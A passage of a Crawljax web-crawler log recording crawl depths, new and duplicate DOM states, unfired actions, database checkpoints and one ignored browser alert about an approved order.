There are 29 states with unfired actions 1908043 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1909207 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1910389 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1911601 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state288 added to the StateMachine. 1911601 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1911610 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1913833 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1915043 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1916196 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1917374 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state289 added to the StateMachine. 1917374 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1917382 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1919618 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1920803 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1921949 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1923146 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state290 added to the StateMachine. 1923146 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1923155 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1925361 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1926510 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1927672 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1928905 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state291 and state259 are the same. 1928908 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1931124 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1932275 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1933450 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1934654 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state292 added to the StateMachine. 1934654 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1934662 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1936867 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1938020 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1939233 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1940496 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state293 added to the StateMachine. 1940496 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1940505 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1942726 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1943880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1945041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1946259 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state294 added to the StateMachine. 1946259 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1946286 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1948536 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1949679 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1950847 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1952088 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state295 added to the StateMachine. 1952089 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1952098 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1954322 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1955480 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1956642 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1957880 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state296 added to the StateMachine. 1957881 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1957886 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 1958973 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Order Number 1234 Was Approved): Order Number 1234 Was Approved Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 1959000 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1961426 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1962564 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1963899 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1965075 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state298 and state265 are the same. 1965079 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1965378 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 1965378 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 1965384 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 1965567 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 1965570 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 1967320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1968478 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1969632 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1970888 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state299 added to the StateMachine. 1970888 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1970897 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1973119 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1974254 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1975408 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1976655 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state300 added to the StateMachine. 1976655 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1976665 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1978901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1980045 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1981201 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1982498 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state301 and state190 are the same. 1982502 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1984802 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1985938 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1987073 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1988263 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state302 added to the StateMachine. 1988263 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1988273 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1990511 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1991659 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1992819 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1994057 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state303 added to the StateMachine. 1994057 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 1994067 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 1996305 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 1997441 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 1998609 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 1999844 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state304 and state37 are the same. 1999848 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2002148 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2003329 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2004525 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state305 added to the StateMachine. 2004526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 2004545 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2006763 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2007919 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2009081 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2010292 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state306 added to the StateMachine. 2010292 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2010301 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2012581 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2013894 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2015382 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state307 added to the StateMachine. 2015382 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 2015477 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2017746 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2018901 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2020354 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2021861 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state308 added to the StateMachine. 2021861 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2021870 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2024079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2025251 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2026572 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2028064 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state309 added to the StateMachine. 2028064 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2028073 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2030276 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2031415 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2032710 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2034339 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state310 added to the StateMachine. 2034339 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2034348 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2036560 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2037699 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2039143 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2040666 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state311 and state14 are the same. 2040670 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2042885 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2044061 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2045514 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2047021 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state312 added to the StateMachine. 2047022 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2047036 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2049292 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2050479 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2051781 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2053315 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state313 and state14 are the same. 2053319 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2055584 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2056726 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2058434 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2059957 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state314 and state102 are the same. 2059961 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2062201 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2063364 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2064527 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2065717 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state315 added to the StateMachine. 2065717 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2065726 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2067938 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2069086 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2070342 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2071571 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state316 added to the StateMachine. 2071571 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2071580 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2073816 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2074964 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2076145 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2077366 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state317 added to the StateMachine. 2077366 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2077375 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2079599 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2080751 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2081898 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2083123 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state318 added to the StateMachine. 2083123 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2083133 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2085346 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2086482 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2087685 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2089025 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state319 added to the StateMachine. 2089025 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2089035 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2091264 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2092408 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2093556 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2094763 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state320 added to the StateMachine. 2094763 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2094772 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2097099 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2098235 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2099385 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2100594 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state321 and state292 are the same. 2100598 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2102828 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2103968 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2105113 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2106346 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state322 added to the StateMachine. 2106346 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2106355 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2108731 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2109898 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2111041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2112217 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state323 added to the StateMachine. 2112217 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2112226 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2114492 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2115660 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2116801 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2117977 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state324 added to the StateMachine. 2117977 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2117985 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2120219 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2121373 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2122526 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2123727 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state325 added to the StateMachine. 2123727 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2123736 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2125971 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2127123 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2128268 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2129462 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state326 added to the StateMachine. 2129462 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2129467 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 2130589 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2132882 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2134062 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2135185 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2136328 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state328 added to the StateMachine. 2136328 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2136337 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2138567 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2139715 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2140867 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2142065 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state329 added to the StateMachine. 2142065 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2142074 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 2144508 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2145698 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2146858 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2148066 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state330 and state14 are the same. 2148069 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2150320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2151487 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2152680 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2153880 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state331 added to the StateMachine. 2153880 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2153889 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2156110 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2157276 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2158427 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2159610 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state332 added to the StateMachine. 2159610 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2159618 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2161844 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2163006 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2164179 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2165434 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state333 added to the StateMachine. 2165435 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2165444 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2167656 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2168830 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2170010 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2171274 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state334 and state37 are the same. 2171277 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2173503 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2174650 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2175881 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state335 added to the StateMachine. 2175881 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 2175907 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2178131 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2179285 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2180471 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2181712 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state336 added to the StateMachine. 2181712 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2181722 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 2183941 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2185090 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2186588 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state337 added to the StateMachine. 2186589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 2186706 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2188966 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2190121 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2191404 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2192904 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state338 added to the StateMachine. 2192905 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2192914 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2193697 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 2193697 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 2193710 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 2193937 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 2193940 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 2195379 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2196563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2197857 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2199375 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state339 added to the StateMachine. 2199375 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2199385 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2201632 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2202801 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2204103 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2205593 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state340 and state14 are the same. 2205600 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 2207838 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2208995 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2210268 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2211905 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - 